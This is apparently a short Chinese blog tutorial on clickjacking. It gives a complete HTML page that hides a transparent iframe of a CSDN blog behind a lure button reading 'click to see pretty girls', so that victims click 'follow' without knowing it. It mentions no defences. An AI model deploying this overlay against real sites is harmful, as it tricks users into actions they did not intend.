简单学习点击劫持

点击劫持是一种视觉欺骗的攻击手段。攻击者将需要攻击的网站通过 iframe 嵌套的方式嵌入自己的网页中，并将 iframe 设置为透明，在页面中透出一个按钮诱导用户点击。

这里来演示一下 首先这是我的csdn博客地址（当然这里不存在点击劫持）

然后如果我想利用点击劫持来让用户来关注我 这里就要用到iframe标签嵌套 然后设置一个按钮

还有诱骗他人点击的内容这些可以自行写 这里简单用“点击看美女代替”

<!DOCTYPE HTML>
<html>
<meta http-equiv="Content-Type" content="text/html; charset="utf-8" />
<head>
<title>点击劫持</title>
<style>
     html,body,iframe{
         display: block;
          height: 100%;
          width: 100%;
          margin: 0;
          padding: 0;
          border:none;
     }
     iframe{
          opacity:0;
          filter:alpha(opacity=0);
          position:absolute;
          z-index:2;
     }
     button{
          position:absolute;
          top: 340px;
          left: 290px;
          z-index: 1;
          width: 72px;
          height: 26px;
     }
</style>
</head>
     <body>
          点击看美女
          <button>查看详情</button>
          <iframe src="https://blog.csdn.net/2301_81368488/article/details/136040257"></iframe>
     </body>
</html>

这里的 opacity就是透明度 如何没设置透明度或者透明度较高就是这个样子

将透明度拉慢就是如下

然后通过调整按钮的位置将按钮放在我关注的地方即可

可以看见只要透明度拉低对方一点击就能直接关注我 由于csdn校验比较严格所以点击直接就跳转到登录页面

当然还是很多薄弱的地方 这里只是举例

感谢各位大佬观看 可以加qq联系3661629617